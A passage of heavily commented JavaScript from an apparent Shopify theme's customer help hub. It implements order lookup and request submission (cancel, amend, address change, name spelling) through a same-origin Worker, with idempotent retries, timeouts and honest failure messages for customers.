   ██  BACKEND CALL 1 OF 2 — LOOK THE ORDER UP  ██
   ---------------------------------------------------------------------------
   Its sibling, submitRequest(), is directly below. Those two are the only
   things in this file that talk to a server.

   CONFIG.api.lookupUrl is a section setting ("Order lookup endpoint"). It must
   be a SAME-ORIGIN Shopify App Proxy path — `/apps/help/order-lookup` — in
   front of a server (a Cloudflare Worker, say) that holds the Shopify Admin API
   token. NEVER put that token in the theme. A theme asset is world-readable:
   anyone can fetch it, and an Admin token in one is a full read/write breach of
   the store's orders and customers, not a misconfiguration.

   Same-origin also means no CORS preflight and no third-party host in the
   store's connect-src.

   The Worker returns an identical {ok:false,reason:"no_match"} for every
   rejection (wrong order, wrong email, rate-limited) so it cannot be used as
   an enumeration oracle. This UI must therefore never say "that order exists
   but the email is wrong".

   THE SEAM IS normaliseOrder(), NOT THIS FUNCTION. Both paths — mock and live —
   return `normaliseOrder(raw)`, so there is exactly one place where the Shopify
   GraphQL shape becomes the shape the views consume. Nothing downstream of this
   file ever touches `.edges`, and no view has to reshape data.

   REQUIRED GraphQL projection (the confirmed-working one, plus two additions
   marked ★ that this UI needs and that the original projection lacked):

     order { id name createdAt processedAt cancelledAt email phone
       displayFulfillmentStatus displayFinancialStatus
       totalPriceSet{shopMoney{amount currencyCode}}
       customer{id firstName lastName email}
       shippingAddress{firstName lastName name address1 address2 city province
         provinceCode zip country countryCodeV2 phone company}
       lineItems(first:20){edges{node{id title quantity sku variantTitle
         vendor                                     ★ needed by isSeel()
         variant{id title} product{id title}
         customAttributes{key value}                ★ needed by fix-spelling
         merchantEditable                           ★ returns hub (not read yet)
         restockable                                ★ returns hub (not read yet)
         originalTotalSet{shopMoney{amount currencyCode}} refundableQuantity}}}
       fulfillments(first:10){id status createdAt trackingInfo{number url company}}
       fulfillmentOrders(first:10){edges{node{id status requestStatus
         supportedActions{action}                   ★ needed by foIsOpen()
       }}} }

   Every ★ field degrades safely if the Worker omits it: isSeel() falls back to
   the SKU, foIsOpen() falls back to status + requestStatus, and the three round-5
   additions normalise to an empty list / null (see normaliseOrder()) — the
   spelling flow then simply reports that this order has no personalised items,
   which is the same answer it gives an ordinary order.

   WHAT `customAttributes` ACTUALLY IS. It is the GraphQL read side of a LINE
   ITEM PROPERTY — the `properties[Name]` input on the personalised product's
   page. Same data, three names depending on where you are standing:
     storefront form   ->  properties[Name]
     REST / MabangErp3 ->  line_items[].properties  [{name:"Name", value:"Sofia"}]
     GraphQL Admin     ->  lineItem.customAttributes [{key:"Name", value:"Sofia"}]
   It is NOT a metafield. A metafield describes the product; this is the
   customer's own input, captured per order line, and it is what the 3PL reads.

   `merchantEditable` and `restockable` are requested now rather than later
   because they answer the two questions the returns hub will open with — can
   this line be edited on the order at all, and does sending it back put stock
   back on the shelf. Nothing in this round reads either one; they are in the
   projection and carried through normaliseOrder() so that adding the returns
   hub is a UI job and not another round-trip to change the query. A personalised
   item is the obvious `restockable:false` case: nobody else wants a backpack
   with someone else's child's name on it.

   TWO FIELDS ARE NOT SHOPIFY'S, and the Worker owns both. Each is optional and
   each is one line to add:

   1. `trackingMovedAt` — an ISO timestamp meaning "the carrier has scanned this
      parcel at least once". There is no such thing in the Admin API; Shopify
      knows a tracking number was assigned, not whether the parcel has ever
      moved. Take it from 17TRACK's first tracking event. When absent the
      interception heuristic in evaluate() applies; when present it forces
      DISPATCHED unconditionally.

   2. `serverNow` — an ISO timestamp of the WORKER'S OWN CLOCK at the moment it
      built the response: `serverNow: new Date().toISOString()` on the order
      object it returns (normaliseOrder() reads it off `data.order`). Every age
      this hub reasons about is a server timestamp minus a clock, and without
      this that clock is the customer's device. A tablet with a flat RTC battery
      running two days slow made a parcel labelled 60 hours ago look 12 hours
      old and got offered a live cancel form; a device running fast produced a
      negative age. With serverNow both sides of the subtraction are server
      time. Accepted on the order object or at the top level of the payload,
      and if neither is present the fetch below falls back to the response's
      own `Date` header, which is a server clock too. Only when all three are
      missing is nowMs() exactly Date.now(), i.e. today's behaviour. See
      nowMs() and normaliseOrder().
   =========================================================================== */
function lookupOrder(input) {
  /* THE ONE BACKEND SEAM. The prototype shipped a mock branch here driven by
     CONFIG.api.useMock; the theme build does not, because a storefront that can
     be flipped into serving fictional orders is a support incident waiting to
     happen. Mocks live in the prototype (contact-hub.html) with its dev bar. */
  return fetch(CONFIG.api.lookupUrl, {
    method: "POST",
    headers: { "content-type": "application/json" },
    body: JSON.stringify({
      orderNumber: input.orderNumber,
      email:       input.email,
      name:        input.name,        // captured for the ticket, NOT a factor
      elapsedMs:   input.elapsedMs,   // bot check
      website:     input.honeypot     // honeypot, must be empty
    })
  })
  /* The response's own `Date` header is a SERVER clock, it is CORS-safelisted
     so it is readable without any extra header plumbing, and it costs nothing.
     It is the fallback for `serverNow` (see nowMs()): if the Worker is never
     updated to stamp the field, the ages this hub reasons about are still
     measured against a server clock rather than the customer's device. An
     explicit serverNow always wins, and it is accepted either on the order or
     at the top level of the payload, because both are natural places for the
     Worker to put it. */
  .then(function (res) {                          // always HTTP 200, ok:true|false
    var hdr = null;
    try { hdr = res.headers.get("date"); } catch (e) { /* header not exposed */ }
    return res.json().then(function (data) { return { data:data, hdr:hdr }; });
  })
  .then(function (r) {
    var data = r.data;
    if (!data || !data.ok || !data.order) return { ok:false, reason:"no_match" };
    var raw = data.order;
    if (!raw.serverNow && (data.serverNow || r.hdr)) {
      raw = shallowCopy(raw);                 // never mutate the parsed payload
      raw.serverNow = data.serverNow || r.hdr;
    }
    /* The evidence ticket rides along with the order, and this is the only
       place it is ever issued: the Worker mints it at the one moment somebody
       has proved they hold this order's email. A Worker that has not been
       updated simply omits it, and the returns flow then holds the customer at
       the photo step rather than uploading into a refusal. */
    return { ok:true, order: normaliseOrder(raw),
             evidenceTicket: typeof data.evidenceTicket === "string" ? data.evidenceTicket : null };
  })
  .catch(function () { return { ok:false, reason:"no_match" }; });
}


/* ===========================================================================
   ██  BACKEND CALL 2 OF 2 — SEND THE REQUEST  ██
   ---------------------------------------------------------------------------
   The sibling of lookupOrder(), and the last thing in this file that talks to a
   server. CONFIG.api.submitUrl is a section setting ("Request submission
   endpoint") and must be a SAME-ORIGIN App Proxy path — `/apps/help/submit-request`
   — in front of the same Worker. Same rule, same reason: NO TOKEN, EVER, in a
   theme asset.

   WHY THIS EXISTS. All four submit handlers used to be `setTimeout(…, 800)`.
   The customer read "your cancellation request is in", was given a request id,
   and NOTHING had left the browser. That is the worst failure this project can
   have — worse than any refusal — because a customer who believes the packing
   team was told STOPS CHASING, and the parcel goes out.

   SO THE BIT EVERY CALLER MUST END UP WITH IS `told`: was the packing team
   actually told. It is true only on a confirmed ok:true from the Worker. Never
   optimistically, never on a timeout, never on a 502.

   THE SERVER'S REQUEST ID IS AUTHORITATIVE. The id on the customer's screen is
   the id in the packing team's message and on the CS board. A locally-minted id
   diverges the moment the server mints its own, and a customer quoting
   "LC-REQ-4203" then means nothing to the person reading the board. requestId()
   still exists and is reachable ONLY from the prototype's mock path.

   THE WORKER ALWAYS ANSWERS HTTP 200 with {ok:true|false,…}. Anything else — a
   502 from the CDN, an App Proxy that is not mounted, a dropped connection, a
   captive portal serving an HTML login page — is NOT an answer, and comes back
   from here as reason:"network". It must never be allowed to read as a refusal,
   and still less as a success.

   RETRYING IS SAFE, AND THE COPY SAYS SO OUT LOUD. The Worker derives an
   idempotency key from the order, the flow and the sanitised payload, and holds
   the claim in a Durable Object; the same request twice is one request, and the
   second comes back as the ORIGINAL result with duplicate:true. That is what
   makes "press it again" an honest thing to offer after a network failure.

   REQUEST BODY — the Worker's documented contract (worker/src/index.js §2):

     {
       flow:        "cancel-order" | "amend-order" | "address-change" | "fix-spelling",
       orderId:     "gid://shopify/Order/1234567890",
       orderNumber: "#LC12345",
       email:       "someone@example.com",   // re-verified server-side
       name:        "Margaret Wilson",       // for the ticket, gates nothing
       elapsedMs:   8421,                    // bot gate, as on the lookup
       website:     "",                      // honeypot, must be empty
       payload:     { …flow specific… }
     }

   FLOW PAYLOADS — field names copied from that contract, not invented here. An
   unknown key is DROPPED by the Worker rather than passed through, so a typo is
   a silently missing line on the packing team's message, not an error:

     cancel-order    { reason }
     amend-order     { reason, currentItem, desiredItem, lineItemId,
                       swapOutValue, swapInValue }
     address-change  { address:{ name, phone, address1, address2, company, city,
                                 province, provinceCode, zip, country, countryCode } }
     fix-spelling    { lineItemId, name }

   RESPONSES:
     { ok:true,  requestId, state, duplicate, discordPosted, notionCreated }
     { ok:false, reason:"no_match" }                 auth / shape / rate limits
     { ok:false, reason:"not_eligible", state }      the order moved under us
     { ok:false, reason:"po_box", field }
     { ok:false, reason:"incomplete_address", field }
     { ok:false, reason:"invalid_address", field }
     { ok:false, reason:"invalid_name", rule, limit }
     { ok:false, reason:"no_such_item" }
     { ok:false, reason:"unchanged" }
     { ok:false, reason:"too_many_requests" }
     { ok:false, reason:"unavailable" }              no durable store / both sinks down

   submitFailureCopy() below has a branch for every one of those. Add a reason
   to the Worker and its default branch still tells the truth — "not sent, safe
   to try again" — it just does it less specifically.
   =========================================================================== */

/* TIME ON FORM for the Worker's bot gate (MIN_ELAPSED_MS, 1200ms by default).
   Measured from when the hub booted rather than from when the current screen
   rendered, because it is all one session: the customer has already looked an
   order up to get this far, so the earlier stamp is both the truthful figure
   and the one that cannot false-positive a fast tick-and-click on a review
   screen they have already read. Only a floor is enforced, so a larger number
   is never a problem. */
var HUB_STARTED_AT = Date.now();

/* The honeypot the Worker gates on. The hub's only honeypot input lives on the
   lookup form (#lk-website) and that view is long gone by the time anything is
   submitted, so this is normally the empty string the Worker requires. Read
   from the live input rather than hard-coded, so that putting a honeypot on a
   submit form later needs no change here. */
function submitHoneypot() {
  var hp = $("#lk-website");
  return hp ? hp.value : "";
}

/* How long we wait for the Worker before calling it a network failure. Chosen
   above the Worker's own worst case (Shopify re-read + Discord + Notion, behind
   a deliberate timing floor) and well below a customer's patience. */
var SUBMIT_TIMEOUT_MS = 20000;

/* HOW MANY SUBMITS ARE OUTSTANDING RIGHT NOW.
   The idle timer used to fire in the middle of one, clear State.order, and turn
   a confirmed ok:true into a response the handlers' own guard silently threw
   away — the packing team told, the customer shown "You were inactive, so we
   closed your order for privacy", and nothing on screen saying the request had
   landed. A submit in flight IS activity. */
var SUBMITS_IN_FLIGHT = 0;
/* When the newest submit started. The counter alone would disable the idle
   timer for ever if it ever leaked (a synchronous throw out of fetch, say), and
   an idle timer that never fires is a privacy regression — so the suppression
   is also bounded by the wall clock, a little past the submit deadline. */
var LAST_SUBMIT_AT = 0;
function submitInFlight() {
  return SUBMITS_IN_FLIGHT > 0 &&
         (Date.now() - LAST_SUBMIT_AT) < (SUBMIT_TIMEOUT_MS + 10000);
}

function submitRequest(flow, payload) {
  var order = State.order || {};
  var body = {
    flow:        flow,
    /* Both order references are sent. The Worker prefers the gid and falls back
       to parsing the number, and neither is trusted: it re-reads the order from
       Shopify and re-verifies the email against what it read. */
    orderId:     order.id || "",
    orderNumber: order.name || State.lookup.orderNumber || "",
    email:       State.lookup.email || order.email || "",
    name:        State.lookup.name || "",
    elapsedMs:   Date.now() - HUB_STARTED_AT,
    website:     submitHoneypot(),
    payload:     payload || {}
  };

  /* A DEADLINE. `fetch` rejects on a transport error and NEVER on a slow peer:
     a socket that stays open with no response keeps the promise pending for
     ever, and no browser imposes a default limit on it. Without this, a
     mis-mounted App Proxy subpath, a captive gateway that swallows POSTs or a
     Worker mid-rollout left the customer on a spinner with the button disabled,
     told nothing at all — not "sent", not "not sent" — until the idle timer
     eventually reset them with a message about privacy that reads as "your
     session expired" rather than "your cancellation never went".

     The abort rejects into the catch below, which answers reason:"network" —
     and that copy is both the honest answer and a safe one, because the
     Worker's Durable-Object claim makes pressing the button again idempotent. */
  var ac = ("AbortController" in window) ? new AbortController() : null;
  var timer = ac ? setTimeout(function () { try { ac.abort(); } catch (e) {} }, SUBMIT_TIMEOUT_MS) : null;
  var settled = false;
  SUBMITS_IN_FLIGHT++;
  LAST_SUBMIT_AT = Date.now();
  touchIdleTimer();          // re-arm now that the counter is non-zero
  var settle = function (out) {
    if (timer) { clearTimeout(timer); timer = null; }
    if (!settled) { settled = true; SUBMITS_IN_FLIGHT--; touchIdleTimer(); }
    return out;
  };

  return fetch(CONFIG.api.submitUrl, {
    method: "POST",
    /* The App Proxy signs the request with logged_in_customer_id when there is
       a storefront session, and that is the narrowest identity the Worker's
       tightest rate-limit bucket can key on. It only arrives if the session
       cookie goes with the request. */
    credentials: "same-origin",
    headers: { "content-type": "application/json" },
    body: JSON.stringify(body),
    signal: ac ? ac.signal : undefined
  })
  .then(function (res) {
    /* NOT AN ANSWER. The Worker replies 200 to everything it handles, so a
       non-200 came from something in front of it. Reading it as a refusal would
       tell the customer their address was rejected when in truth nobody was
       told anything at all. */
    if (!res.ok) return settle({ ok:false, told:false, reason:"network", status:res.status });
    return res.json().then(function (data) {
      return settle(readSubmitResponse(data));
    }, function () {
      /* 200 with a body that is not JSON: a captive portal, or an HTML error
         page from something between us and the Worker. */
      return settle({ ok:false, told:false, reason:"network" });
    });
  })
  .catch(function () {
    /* Offline, DNS, TLS, our own abort above, or a navigation. */
    return settle({ ok:false, told:false, reason:"network" });
  });
}

/* The Worker's JSON becomes the one shape the four handlers read. `told` is
   computed here, once, so no caller can get it wrong. */
function readSubmitResponse(data) {
  if (!data || typeof data !== "object") return { ok:false, told:false, reason:"network" };

  if (data.ok === true) {
    /* AN IN-FLIGHT DUPLICATE IS NOT A CONFIRMATION.
       The Worker answers {ok:true, duplicate:true, discordPosted:null,
       notionCreated:null} when an identical request is already being processed
       by ANOTHER request it is not the one handling — a double-tap, two tabs,
       a restored bfcache page. Those two nulls mean "I did not post this and I
       cannot tell you whether it landed". The first request can still lose:
       if both sinks fail it releases the claim and answers ok:false, and only
       that first caller is told. Collapsing the nulls to `true` gave the second
       caller a full confirmation screen, a request id and State.submitted for a
       request that was released and never landed anywhere.
       So: provisional, never confirmed, and retry:false so no second ticket is
       minted. */
    if (data.duplicate === true && data.discordPosted === null && data.notionCreated === null) {
      return {
        ok: false, told: false, reason: "in_flight",
        requestId: String(data.requestId == null ? "" : data.requestId)
      };
    }

    /* THE SERVER'S ID IS THE PROOF OF DELIVERY, NOT `ok:true` ON ITS OWN.
       Every ok:true branch in the Worker carries a requestId — the fresh
       result, the committed duplicate and the in-flight duplicate alike — so an
       ok:true with no id CANNOT have come from the Worker. It comes from
       something else that answers 200: a lookup endpoint pasted into the submit
       setting by mistake (the two settings are adjacent free text and the
       submit body carries everything handleOrderLookup gates on, so it runs to
       completion and answers {ok:true, serverNow, order}), a cached or replayed
       response, an App-Proxy-shaped stub. Accepting those told the customer
       "your cancellation request is in", set State.submitted so every re-entry
       showed the already-requested card, and nothing had left the browser.
       An answer the packing team cannot be quoted is not an answer: it belongs
       in the "not sent, safe to try again" branch, which is honest and, thanks
       to the Worker's idempotency, harmless to act on. */
    var rid = String(data.requestId == null ? "" : data.requestId).trim();
    if (!rid) return { ok:false, told:false, reason:"network" };

    return {
      ok: true,
      told: true,
      requestId: rid,
      state: String(data.state == null ? "" : data.state),
      duplicate: data.duplicate === true,
      /* ONLY AN EXPLICIT false MEANS THE SINK WAS NOT WRITTEN. */
      discordPosted: data.discordPosted === false ? false : true,
      notionCreated: data.notionCreated === false ? false : true
    };
  }

  var out = { ok:false, told:false, reason: String(data.reason || "unknown") };
  if (data.field != null) out.field = String(data.field);
  if (data.rule  != null) out.rule  = String(data.rule);
  if (data.state != null) out.state = String(data.state);
  if (data.limit != null && isFinite(Number(data.limit))) out.limit = Number(data.limit);
  return out;
}

/* Human labels for the address field names the Worker names in `field`.
   incomplete_address and invalid_address use the payload's own keys; po_box
   uses detectPoBox's labels, which are already human ("address line 1", "town
   or city") and pass through unchanged. */
var SUBMIT_FIELD_LABELS = {
  address1: "submit.field.address1", address2: "submit.field.address2",
  city: "submit.field.city", province: "submit.field.province", zip: "submit.field.zip",
  country: "submit.field.country", phone: "submit.field.phone", name: "submit.field.name",
  company: "submit.field.company", reason: "submit.field.reason",
  "requested item": "submit.field.requestedItem",
  "current item": "submit.field.currentItem"
};
function submitFieldLabel(field) {
  var f = String(field || "").trim();
  if (!f) return t("submit.field.fallback");
  /* An unmapped field name is passed through as the Worker wrote it — those are
     already human ("address line 1", "town or city") and inventing a key for
     them would fail closed on a name this file has never seen. */
  return SUBMIT_FIELD_LABELS[f] ? t(SUBMIT_FIELD_LABELS[f]) : f;
}

/* The request id as it appears in the STAFF-FACING log line. The Worker always
   sends one on success, but a version of it that did not would otherwise leave
   the Notion log reading "Request  raised from the contact hub" — which looks
   like a formatting bug rather than a missing reference. Say which it is. */
function idForLog(id) {
  return id || "(no id returned by the backend)";
}

/* Which words we use for a given flow's request, in the same vocabulary
   alreadyRequestedCard() already uses on screen. */
function flowRequestLabel(flow) {
  return t(flow === "cancel-order" ? "request.label.cancel"
         : flow === "amend-order"  ? "request.label.amend"
         : flow === "fix-spelling" ? "request.label.spelling"
         : "request.label.address");
}

/* ---------------------------------------------------------------------------
   WHAT WE SAY WHEN A SUBMIT DOES NOT SUCCEED.

   THE FIRST SENTENCE OF EVERY BRANCH ANSWERS ONE QUESTION: was the packing team
   told. Nothing else on the screen matters as much. A customer who thinks a
   request is in stops chasing, so a vague failure message is more expensive
   than a blunt one.

   `retry` says whether pressing the same button again could plausibly work. It
   is true when the thing that needs fixing is on THIS screen, or when the fault
   is ours and transient; false when it is neither — and the caller then hides
   the button rather than leaving a control that can only fail again in the same
   way. Where retry is true the copy says out loud that pressing again is safe,
   which is true because the Worker is idempotent.

   NO RETURNS CTA for cancel-order, address-change or fix-spelling — round-2
   rule A3 and its round-5 extension. A customer who came here to stop an order
   or fix an address was not thinking about sending the parcel back, and
   dangling a return in front of them at the moment they are told bad news
   manufactures returns that would not otherwise happen. Only amend-order gets
   the returns sentence, and only in the state where a wrong item genuinely has
   no other remedy.
   ------------------------------------------------------------------------- */
function submitFailureCopy(flow, res) {
  var reason  = (res && res.reason) ? String(res.reason) : "unknown";
  var order   = State.order || {};
  var email   = order.email || (State.lookup && State.lookup.email) || t("submit.emailFallback");
  var oname   = order.name || t("submit.orderFallback");
  var support = CONFIG.store.supportEmail;
  var what    = t(flow === "cancel-order" ? "submit.what.cancel"
                : flow === "amend-order"  ? "submit.what.amend"
                : flow === "fix-spelling" ? "submit.what.spelling"
                : "submit.what.address");
  var safe    = t("submit.frag.safe");
  var mail    = t("submit.frag.mail", { support: support });
  var notSent = t("submit.frag.notSent");

  /* ---- Ours, and transient. The one case where "try again" is the answer. -- */
  if (reason === "network") {
    /* NOT "it never reached us". That was asserted for every non-200 and every
       fetch rejection, including the ones where the Worker ran to completion —
       a runtime kill after the Discord post, a connection dropped after the
       response headers. In those the message IS sitting in front of the packing
       team and we have just told the customer flatly that it is not. Keep the
       emphasis and keep the retry (which is genuinely idempotent: the committed
       claim comes back as the original result with no cap consumed), but say
       only what we know. */
    return {
      retry: true,
      text: t("submit.network.text", { safe: safe }),
      announce: t("submit.network.announce")
    };
  }

  /* ---- Somebody else's copy of this exact request is mid-flight. The Worker
     is explicit that it is not the one processing it and cannot say whether it
     landed, so neither can we. Provisional, and NOT retryable — a second press
     is what produced this answer in the first place. ---------------------- */
  if (reason === "in_flight") {
    return {
      retry: false,
      text: t("submit.inFlight.text", { email: email, support: support }),
      announce: t("submit.inFlight.announce")
    };
  }

  /* ---- The send worked; the screen that reports it did not. The honest answer
     here is the OPPOSITE of the network branch: yes, they were told. --------- */
  if (reason === "render") {
    var rid = (res && res.requestId) ? String(res.requestId) : "";
    return {
      retry: false,
      text: t("submit.render.text", {
        reference: rid ? t("submit.render.reference", { id: rid }) : "",
        email: email
      }),
      announce: t("submit.render.announce", {
        reference: rid ? t("submit.render.announceReference", { id: rid }) : ""
      })
    };
  }
  if (reason === "unavailable") {
    return {
      retry: true,
      text: t("submit.unavailable.text", { safe: safe, mail: mail }),
      announce: t("submit.unavailable.announce")
    };
  }

  /* ---- Already asked. Point at the request they have, not at a new one. ---- */
  if (reason === "too_many_requests") {
    /* NOT "there are already several requests open ... and those are the ones
       our packing team are working through". This is reachable with nothing
       open at all: the Worker consumes the per-(order, flow) cap BEFORE it
       tries Discord and Notion, so attempts that landed nowhere still spent the
       budget, and the "unavailable" branch above invites exactly those retries.
       (The Worker now rolls the cap back on that path; this copy still must not
       assert something the client cannot know.) Say what we can actually stand
       behind, and give this branch the same support-email escape hatch every
       other non-retryable branch has — without one the customer was left with a
       false statement and zero routes. */
    return {
      retry: false,
      text: t("submit.tooMany.text",
              { notSent: notSent, order: oname, email: email, support: support }),
      announce: t("submit.tooMany.announce")
    };
  }

  /* ---- THE RACE. The 3PL pulls orders through the day, not at one fixed
     time, so an order that was open when this form rendered can be packed by
     the time it is submitted. This is not rare and it is not the customer's
     fault, and the message has to say both. ------------------------------- */
  if (reason === "not_eligible") {
    var st = (res && res.state) ? String(res.state) : "";

    if (st === "CANCELLED") {
      return {
        retry: false,
        text: t("submit.cancelled.text", { order: oname, what: what, support: support }),
        announce: t("submit.cancelled.announce")
      };
    }
    if (st === "ON_HOLD") {
      return {
        retry: false,
        text: t("submit.onHold.text", { notSent: notSent, order: oname, email: email }),
        announce: t("submit.onHold.announce")
      };
    }
    if (st === "UNCONFIRMED" || st === "UNKNOWN" || st === "CLOSED_NO_TRACKING" || !st) {
      return {
        retry: false,
        text: t("submit.unconfirmed.text",
                { notSent: notSent, order: oname, support: support }),
        announce: t("submit.unconfirmed.announce")
      };
    }

    /* DISPATCHED, FULFILLED_NO_TRACKING, PARTIALLY_FULFILLED — it has gone, or
       part of it has. NO RETURNS CTA here for cancel / address-change /
       fix-spelling (A3). No carrier name (A2). */
    var part = st === "PARTIALLY_FULFILLED";
    /* The reassurance used to say our packing team "take orders through the day
       rather than at one set time". The rest of this project says the opposite —
       fulfilment is one daily batch (see the Worker's own note above its
       re-read) — so the one kind sentence in the branch rested on a premise the
       codebase elsewhere calls wrong. Reworded to something both true and
       equally kind. Everything else here is unchanged and deliberate: no blame,
       no carrier name, no country of origin, and no returns CTA except on
       amend-order (rule A3). */
    return {
      retry: false,
      text: t("submit.gone.text", {
        subject: t(part ? "submit.gone.subjectPart" : "submit.gone.subjectWhole",
                   { order: oname }),
        what: what,
        email: email,
        returns: flow === "amend-order" ? t("submit.gone.returns") : ""
      }),
      announce: t("submit.gone.announce", { what: what })
    };
  }

  /* ---- Undeliverable address, on either path the Worker scans. ------------- */
  if (reason === "po_box") {
    if (flow === "address-change") {
      return {
        retry: false,
        text: t("submit.poBox.address.text", {
          notSent: notSent,
          field: (res && res.field)
            ? t("submit.poBox.address.field", { field: submitFieldLabel(res.field) })
            : ""
        }),
        announce: t("submit.poBox.address.announce")
      };
    }
    /* USE THE FIELD THE WORKER NAMED. scanFreeTextForPoBox looks at three
       fields and says which one it hit — "reason", "requested item" or "current
       item" — and only the first is something the customer typed. The other two
       come from swapLinesLabel() and itemLabel(), i.e. product names off the
       catalogue and off the order, so telling the customer to edit their note
       sent them to correct text that was already clean and left them looping on
       an identical refusal with no way to reach the offending words. */
    var poField = String((res && res.field) || "reason");
    if (poField === "requested item" || poField === "current item") {
      return {
        retry: false,
        text: t("submit.poBox.item.text", {
          notSent: notSent, field: submitFieldLabel(poField), support: support
        }),
        announce: t("submit.poBox.item.announce", { field: submitFieldLabel(poField) })
      };
    }
    return {
      retry: true,
      text: t("submit.poBox.note.text", { notSent: notSent }),
      announce: t("submit.poBox.note.announce")
    };
  }

  if (reason === "incomplete_address") {
    return {
      retry: false,
      text: t("submit.incompleteAddress.text",
              { notSent: notSent, field: submitFieldLabel(res && res.field) }),
      announce: t("submit.incompleteAddress.announce",
                  { field: submitFieldLabel(res && res.field) })
    };
  }
  if (reason === "invalid_address") {
    return {
      retry: false,
      text: t("submit.invalidAddress.text",
              { notSent: notSent, field: submitFieldLabel(res && res.field) }),
      announce: t("submit.invalidAddress.announce",
                  { field: submitFieldLabel(res && res.field) })
    };
  }

  /* ---- Personalisation. The LIMIT COMES FROM THE SERVER when it sends one,
     so the number in this message and the number the server is actually
     enforcing can never contradict each other on screen. ------------------- */
  if (reason === "invalid_name") {
    var limit = (res && isFinite(res.limit) && res.limit > 0) ? res.limit : personalisationMaxLength();
    var rule = (res && res.rule) ? String(res.rule) : "";
    var spellText =
      rule === "too_long"
        ? t("submit.invalidName.tooLong", { limit: limit })
      : rule === "disallowed_characters"
        ? t("submit.invalidName.disallowed")
      : (rule === "no_letter" || rule === "empty")
        ? t("submit.invalidName.noLetter")
        : t("submit.invalidName.other");
    return { retry: false, text: notSent + spellText,
             announce: t("submit.invalidName.announce") };
  }

  if (reason === "unchanged") {
    return {
      retry: false,
      text: t("submit.unchanged.text"),
      announce: t("submit.unchanged.announce")
    };
  }
  if (reason === "no_such_item") {
    return {
      retry: false,
      text: t("submit.noSuchItem.text", { notSent: notSent, order: oname }),
      announce: t("submit.noSuchItem.announce")
    };
  }

  /* ---- The lookup path's single generic refusal, reached from here when the
     order or the email no longer match, or a rate limit was hit. Same rule as
     VIEWS.lookup: never say which half was wrong. -------------------------- */
  if (reason === "no_match") {
    return {
      retry: false,
      text: t("submit.noMatch.text", { notSent: notSent, mail: mail }),
      announce: t("submit.noMatch.announce")
    };
  }

  /* ---- An answer we do not recognise. Fail towards the truth: not sent, and
     safe to try. -------------------------------------------------------- */
  return {
    retry: true,
    text: t("submit.unknown.text", { safe: safe, mail: mail }),
    announce: t("submit.unknown.announce")
  };
}

/* THE ONE PLACE A FAILED SUBMIT BECOMES WHAT THE CUSTOMER SEES AND HEARS.

   State.submitted is deliberately NOT touched anywhere on this path: a request
   that did not land must stay retryable, and the already-requested card must
   not appear for a request nobody received.

   `restore` is the caller's own business — the four screens disable their
   buttons in two different ways (disabled vs aria-disabled, because the review
   screens must keep the button in the tab order) and only they know which. It
   is passed the `retry` verdict so the button either comes back as a retry or
   goes away. */
function submitFailed(flow, res, errNode, restore) {
  var copy = submitFailureCopy(flow, res);
  if (restore) { try { restore(copy.retry); } catch (e) {} }
  /* say() first, exactly as the failed-lookup path does it: the polite region
     is what a screen reader is actually listening to. #lc-live lives OUTSIDE
     #lc-view, so this reaches the customer even when the view underneath has
     been replaced. */
  say(copy.announce);

  /* THE NODE MAY NO LONGER BE ON THE PAGE.
     Each handler captures its error paragraph BEFORE the send, and the ghost
     "No, keep my order" / "Go back and edit" buttons stay live throughout —
     as does the browser Back button. Either one calls Router.back(), which
     replaces host.innerHTML and orphans the captured node. The old code then
     wrote the failure into a detached paragraph and focused nothing: the
     screen-reader user heard the outcome and the SIGHTED customer was told
     nothing at all, which is the reverse of the usual failure mode and easy to
     miss in testing. Put it somewhere that is actually on the page. */
  if (errNode && errNode.isConnected !== false && document.contains(errNode)) {
    revealAlert(errNode, copy.text);
    if (errNode.focus) errNode.focus();
  } else {
    showDetachedFailure(copy.text);
  }
  return copy;
}

/* The landing surface for a submit outcome whose own screen has gone. Prepended
   into the live view rather than replacing it, so a half-typed form underneath
   survives; role="alert" and focus() so it is both announced and reachable. */
function showDetachedFailure(text) {
  var host = $("#lc-view");
  if (!host) return;
  var old = $("#lc-submit-orphan");
  if (old && old.parentNode) old.parentNode.removeChild(old);
  var box = document.createElement("section");
  box.className = "lc-card lc-card--warn";
  box.id = "lc-submit-orphan";
  box.setAttribute("role", "alert");
  box.setAttribute("tabindex", "-1");
  var p = document.createElement("p");
  p.textContent = text;                       // textContent: never markup
  box.appendChild(p);
  host.insertBefore(box, host.firstChild);
  if (box.focus) box.focus();
  window.scrollTo({ top:0, behavior: reducedMotion() ? "auto" : "smooth" });
}

/* THE OTHER HALF-SUCCESS WORTH BEING HONEST ABOUT. The Worker answers ok:true
   when EITHER sink accepted the request, so discordPosted:false means it is
   recorded with us but the message to the packing team itself did not go out.
   "Recorded with us" and "in front of the packing team" are not the same thing
   and the customer is entitled to know which one they have. No channel names,
   no tool names — that is what CONFIG.debug.showInternalPreviews is for. */
function relayNote(res) {
  return (res && res.discordPosted === false) ? t("submit.relayNote") : "";
}

/* THE MIRROR CASE, WHICH WAS SILENT. The Worker answers ok:true when EITHER
   sink accepted, so notionCreated:false means the packing team WERE told — the
   important half — but the record the customer-service team work their replies
   from was not saved. The blurb on the very same screen promises "we will email
   you as soon as they reply", and with no row behind it nothing generates that
   email. Say which half is missing without naming any internal tool. */
function recordNote(res) {
  return (res && res.notionCreated === false)
    ? t("submit.recordNote", { support: CONFIG.store.supportEmail })
    : "";
}

function joinNotes() {
  return Array.prototype.slice.call(arguments).filter(function (s) {
    return !!(s && String(s).trim());
  }).join(" ");
}

/* What the live region says after a successful send. The success view's heading
   is announced by the router, but a heading cannot carry the request id and
   cannot say that the relay needed a human — see VIEWS.success.mount(). */
function submitAnnouncement(flow, res) {
  return t("submit.announce.sent", {
    what: flowRequestLabel(flow),
    reference: (res && res.requestId)
      ? t("submit.announce.reference", { id: res.requestId }) : ""
  }) + (res && res.discordPosted === false ? t("submit.announce.relayFailed") : "");
}


/* ===========================================================================
   THE ADAPTER — the single seam between Shopify's shape and this UI's shape.

   Shopify returns connections (`{edges:[{node}]}`), splits the customer's name
   across `customer.firstName/lastName`, and types supportedActions as
   `[FulfillmentOrderSupportedAction!]` — objects of shape `{action,externalUrl}`,
   NOT strings. Every one of those was a crash or a silent wrong answer when the
   views read them directly.

   Tolerant by design: it accepts a connection, a plain array, or `{nodes:[…]}`,
   so it works against the mock, the live Worker, and any Worker that already
   flattens its response.
   =========================================================================== */
function gqlList(v) {
  if (!v) return [];
  if (Array.isArray(v)) return v.slice();
  if (Array.isArray(v.edges)) {
    return v.edges.map(function (e) { return e && e.node ? e.node : e; })
                  .filter(function (n) { return !!n; });
  }
